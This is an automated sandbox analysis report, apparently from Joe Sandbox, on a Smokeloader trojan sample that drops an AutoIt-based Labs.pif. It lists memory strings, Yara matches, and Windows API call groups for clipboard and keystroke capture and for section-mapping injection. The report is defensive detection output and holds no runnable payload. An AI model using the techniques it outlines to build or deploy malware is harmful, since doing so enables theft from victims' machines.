        Source: explorer.exe, 0000001C.00000000.2299433125.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.2481065121.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA11f7Wa.img
        Source: explorer.exe, 0000001C.00000000.2299433125.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.2481065121.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA15Yat4.img
        Source: explorer.exe, 0000001C.00000000.2299433125.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.2481065121.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1bjET8.img
        Source: explorer.exe, 0000001C.00000000.2299433125.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.2481065121.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1c9Jin.img
        Source: explorer.exe, 0000001C.00000000.2299433125.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.2481065121.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBNvr53.img
        Source: explorer.exe, 0000001C.00000000.2310676294.000000000C091000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.2491730290.000000000C091000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://outlook.com
        Source: explorer.exe, 0000001C.00000000.2310676294.000000000C091000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.2491730290.000000000C091000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://powerpoint.office.com
        Source: explorer.exe, 0000001C.00000000.2299433125.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.2481065121.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew
        Source: explorer.exe, 0000001C.00000000.2299433125.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.2481065121.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew
        Source: explorer.exe, 0000001C.00000000.2310676294.000000000C091000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.2491730290.000000000C091000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://word.office.com
        Source: lSmb6nDsrC.exe, 00000000.00000003.1239683585.000000000282A000.00000004.00000020.00020000.00000000.sdmp, Labs.pif.2.dr, Orders.0.drString found in binary or memory: https://www.autoitscript.com/autoit3/
        Source: Orders.0.drString found in binary or memory: https://www.globalsign.com/repository/0
        Source: lSmb6nDsrC.exe, 00000000.00000003.1239683585.000000000282A000.00000004.00000020.00020000.00000000.sdmp, Labs.pif.2.dr, Orders.0.drString found in binary or memory: https://www.globalsign.com/repository/06
        Source: explorer.exe, 0000001C.00000000.2299433125.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.2481065121.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/lifestyle/lifestyle-buzz/what-to-do-if-a-worst-case-nuclear-scenario-actua
        Source: explorer.exe, 0000001C.00000000.2299433125.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.2481065121.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/careersandeducation/student-loan-debt-forgiveness-arrives-for-some-b
        Source: explorer.exe, 0000001C.00000000.2299433125.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.2481065121.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/markets/costco-is-seeing-a-gold-rush-what-s-behind-the-demand-for-it
        Source: explorer.exe, 0000001C.00000000.2299433125.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.2481065121.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/realestate/why-this-florida-city-is-a-safe-haven-from-hurricanes/ar-
        Source: explorer.exe, 0000001C.00000000.2299433125.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.2481065121.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/music/news/6-rock-ballads-that-tug-at-the-heartstrings/ar-AA1hIdsm
        Source: explorer.exe, 0000001C.00000000.2299433125.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.2481065121.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/kinzinger-has-theory-about-who-next-house-speaker-will-be/vi
        Source: explorer.exe, 0000001C.00000000.2299433125.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.2481065121.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/technology/prehistoric-comet-impacted-earth-and-triggered-the-switch-
        Source: explorer.exe, 0000001C.00000000.2299433125.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.2481065121.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/us/dumb-and-dumber-12-states-with-the-absolute-worst-education-in-the
        Source: explorer.exe, 0000001C.00000000.2299433125.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.2481065121.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/sports/other/simone-biles-leads-u-s-women-s-team-to-seventh-straight-world
        Source: explorer.exe, 0000001C.00000000.2299433125.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.2481065121.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/topstories/accuweather-el-ni
        Source: explorer.exe, 0000001C.00000000.2299433125.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.2481065121.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/topstories/here-s-who-could-see-above-average-snowfall-this-winter
        Source: explorer.exe, 0000001C.00000000.2299433125.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.2481065121.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/topstories/us-winter-forecast-for-the-2023-2024-season/ar-AA1hGINt
        Source: explorer.exe, 0000001C.00000000.2299433125.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.2481065121.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com:443/en-us/feed
        Source: explorer.exe, 0000001C.00000002.2481065121.00000000071A4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.pollensense.com/
        Source: unknownNetwork traffic detected: HTTP traffic on port 49703 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49703
        Source: unknownHTTPS traffic detected: 104.21.79.229:443 -> 192.168.2.7:49703 version: TLS 1.2

        Key, Mouse, Clipboard, Microphone and Screen Capturing

        barindex
        Source: Yara matchFile source: 0000001B.00000002.2328144383.0000000003021000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001B.00000002.2327756432.0000000001280000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001C.00000002.2477965880.0000000000F41000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: C:\Users\user\Desktop\lSmb6nDsrC.exeCode function: 0_2_004056E5 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,FindCloseChangeNotification,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_004056E5
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pifCode function: 19_2_007E4830 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,19_2_007E4830
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pifCode function: 27_2_007E4830 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,27_2_007E4830
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pifCode function: 19_2_007E4632 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,19_2_007E4632
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pifCode function: 19_2_007D0508 GetKeyboardState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,19_2_007D0508
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pifCode function: 19_2_007FD164 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,19_2_007FD164
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pifCode function: 27_2_007FD164 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,27_2_007FD164

        System Summary

        barindex
        Source: 0000001B.00000002.2328144383.0000000003021000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
        Source: 0000001B.00000002.2327756432.0000000001280000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
        Source: 0000001C.00000002.2477965880.0000000000F41000.00000020.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pifCode function: 27_2_00402F13 RtlCreateUserThread,NtTerminateProcess,27_2_00402F13
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pifCode function: 27_2_0040259B NtEnumerateKey,27_2_0040259B
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pifCode function: 27_2_004014B0 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,27_2_004014B0
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pifCode function: 27_2_00403251 MapViewOfFile,NtMapViewOfSection,NtDuplicateObject,NtQuerySystemInformation,NtOpenKey,strstr,wcsstr,tolower,towlower,27_2_00403251
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pifCode function: 27_2_00402F71 RtlCreateUserThread,NtTerminateProcess,27_2_00402F71
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pifCode function: 27_2_004014CD NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,27_2_004014CD
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pifCode function: 27_2_004014E0 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,27_2_004014E0
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pifCode function: 27_2_004014F3 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,27_2_004014F3
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pifCode function: 27_2_004014BB NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,27_2_004014BB
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pifCode function: 19_2_007D4254: CreateFileW,DeviceIoControl,CloseHandle,19_2_007D4254
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pifCode function: 19_2_007C8F2E _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,19_2_007C8F2E
        Source: C:\Users\user\Desktop\lSmb6nDsrC.exeCode function: 0_2_004034FC EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrlenW,wsprintfW,GetFileAttributesW,DeleteFileW,SetCurrentDirectoryW,CopyFileW,ExitProcess,OleUninitialize,ExitProcess,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_004034FC
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pifCode function: 19_2_007D5778 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,19_2_007D5778
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pifCode function: 27_2_007D5778 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,27_2_007D5778
        Source: C:\Users\user\Desktop\lSmb6nDsrC.exeCode function: 0_2_00406C3F0_2_00406C3F
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pifCode function: 19_2_0077B02019_2_0077B020
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pifCode function: 19_2_00779C8019_2_00779C80
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pifCode function: 19_2_007923F519_2_007923F5
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pifCode function: 19_2_007F840019_2_007F8400
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pifCode function: 19_2_007A650219_2_007A6502
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pifCode function: 19_2_007A265E19_2_007A265E
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pifCode function: 19_2_0077E6F019_2_0077E6F0
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pifCode function: 19_2_0079282A19_2_0079282A
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pifCode function: 19_2_007A89BF19_2_007A89BF
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pifCode function: 19_2_007A6A7419_2_007A6A74
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pifCode function: 19_2_007F0A3A19_2_007F0A3A
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pifCode function: 19_2_00780BE019_2_00780BE0
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pifCode function: 19_2_0079CD5119_2_0079CD51
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pifCode function: 19_2_007CEDB219_2_007CEDB2
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pifCode function: 19_2_007D8E4419_2_007D8E44
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pifCode function: 19_2_007F0EB719_2_007F0EB7
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pifCode function: 19_2_007A6FE619_2_007A6FE6
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pifCode function: 19_2_007933B719_2_007933B7
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pifCode function: 19_2_0078D45D19_2_0078D45D
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pifCode function: 19_2_0079F40919_2_0079F409
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pifCode function: 19_2_007794E019_2_007794E0
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pifCode function: 19_2_0077166319_2_00771663
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pifCode function: 19_2_0078F62819_2_0078F628
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pifCode function: 19_2_007916B419_2_007916B4
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pifCode function: 19_2_0077F6A019_2_0077F6A0
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pifCode function: 19_2_007978C319_2_007978C3
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pifCode function: 19_2_00791BA819_2_00791BA8
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pifCode function: 19_2_0079DBA519_2_0079DBA5
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pifCode function: 19_2_007A9CE519_2_007A9CE5
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pifCode function: 19_2_0078DD2819_2_0078DD28
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pifCode function: 19_2_0079BFD619_2_0079BFD6
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pifCode function: 19_2_00791FC019_2_00791FC0
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pifCode function: 27_2_007923F527_2_007923F5
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pifCode function: 27_2_007F840027_2_007F8400
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pifCode function: 27_2_007A650227_2_007A6502
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pifCode function: 27_2_007A265E27_2_007A265E
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pifCode function: 27_2_0077E6F027_2_0077E6F0
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pifCode function: 27_2_0079282A27_2_0079282A
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pifCode function: 27_2_007A89BF27_2_007A89BF
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pifCode function: 27_2_007A6A7427_2_007A6A74
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pifCode function: 27_2_007F0A3A27_2_007F0A3A
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pifCode function: 27_2_00780BE027_2_00780BE0
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pifCode function: 27_2_0079CD5127_2_0079CD51
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pifCode function: 27_2_007CEDB227_2_007CEDB2
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pifCode function: 27_2_007D8E4427_2_007D8E44
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pifCode function: 27_2_007F0EB727_2_007F0EB7
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pifCode function: 27_2_007A6FE627_2_007A6FE6
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pifCode function: 27_2_0077B02027_2_0077B020
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pifCode function: 27_2_007933B727_2_007933B7
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pifCode function: 27_2_0078D45D27_2_0078D45D
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pifCode function: 27_2_0079F40927_2_0079F409
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pifCode function: 27_2_007794E027_2_007794E0
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pifCode function: 27_2_0077166327_2_00771663
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pifCode function: 27_2_0078F62827_2_0078F628
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pifCode function: 27_2_007916B427_2_007916B4
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pifCode function: 27_2_0077F6A027_2_0077F6A0
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pifCode function: 27_2_007978C327_2_007978C3
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pifCode function: 27_2_00791BA827_2_00791BA8
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pifCode function: 27_2_0079DBA527_2_0079DBA5
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pifCode function: 27_2_007A9CE527_2_007A9CE5
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pifCode function: 27_2_00779C8027_2_00779C80
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pifCode function: 27_2_0078DD2827_2_0078DD28
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pifCode function: 27_2_0079BFD627_2_0079BFD6
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pifCode function: 27_2_00791FC027_2_00791FC0
        Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pif 865347471135BB5459AD0E647E75A14AD91424B6F13A5C05D9ECD9183A8A1CF4
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pifCode function: String function: 00772111 appears 38 times
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pifCode function: String function: 00781CB6 appears 50 times
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pifCode function: String function: 007A1B70 appears 60 times
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pifCode function: String function: 00790D17 appears 140 times
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pifCode function: String function: 0079312D appears 42 times
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pifCode function: String function: 00781A36 appears 68 times
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pifCode function: String function: 00799FA5 appears 46 times
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pifCode function: String function: 00798B30 appears 84 times
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pifCode function: String function: 00774DC0 appears 38 times
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pifCode function: String function: 007939FB appears 36 times
        Source: lSmb6nDsrC.exeStatic PE information: invalid certificate
        Source: lSmb6nDsrC.exe, 00000000.00000003.1325675607.0000000000703000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCmd.Exej% vs lSmb6nDsrC.exe
        Source: lSmb6nDsrC.exe, 00000000.00000003.1239683585.000000000282A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameAutoIt3.exeB vs lSmb6nDsrC.exe
        Source: lSmb6nDsrC.exe, 00000000.00000002.1326164845.0000000000703000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCmd.Exej% vs lSmb6nDsrC.exe
        Source: lSmb6nDsrC.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
        Source: 0000001B.00000002.2328144383.0000000003021000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
        Source: 0000001B.00000002.2327756432.0000000001280000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
        Source: 0000001C.00000002.2477965880.0000000000F41000.00000020.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
        Source: classification engineClassification label: mal100.troj.evad.winEXE@24/14@3/2
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pifCode function: 19_2_007DA6AD GetLastError,FormatMessageW,19_2_007DA6AD
